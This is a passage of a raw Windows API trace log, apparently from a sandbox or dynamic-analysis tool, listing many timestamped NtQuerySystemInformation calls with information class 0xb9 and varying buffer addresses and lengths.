[0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0287.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0287.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0287.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x28, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0287.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0287.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.354] 